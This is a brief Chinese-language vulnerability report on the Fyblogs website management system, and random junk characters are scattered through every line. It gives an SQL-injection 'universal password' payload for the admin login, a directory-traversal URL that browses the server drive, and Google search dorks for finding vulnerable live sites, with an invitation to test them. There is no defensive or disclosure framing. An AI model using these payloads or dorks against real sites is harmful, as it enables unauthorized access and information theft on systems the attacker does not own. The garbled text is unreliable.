漏洞类型: 未授权访问/权限绕过2 \ Z9 h9 K$ c3 f2 z0 A
6 n5 K5 p8 Y) j* f简要描述:$ ` v) }3 H2 e9 p
$ ]1 F! K9 `7 X$ p; P
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!, H {; e1 U4 w- g+ y
" Y; `$ I* p% K5 M) ?. Z; j详细说明:
. f) ~# z7 F$ l Y" ^
' {/ m, U) A+ `后台万能密码 'or'='or'9 ^ f$ m9 m, L) S
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!8 n* ?4 d: |5 _ M5 |
admin/uploadfile.asp?currentFolder=/upfiles/../4 ?1 O$ v. ~) a% f* \) W' Q
% g' A: _/ [3 s) o# i漏洞证明:
+ [, h+ O5 e' v7 @8 d- M" L9 [! v+ l
谷歌:inurl:type.asp?id=1 新闻中心+ d6 p# Q' T8 T5 z6 y1 D; e
或者 :inurl:download_ok.asp?
. \2 [: V6 E8 \/ g7 J! N) B8 s) g7 A5 F A. p5 u
可以测试
" x* }, Y5 m- S4 j0 j5 E+ k
* _3 H- I- R& g2 l( D; a1 ?+ [9 y1 Z1 g5 g3 H. ^
|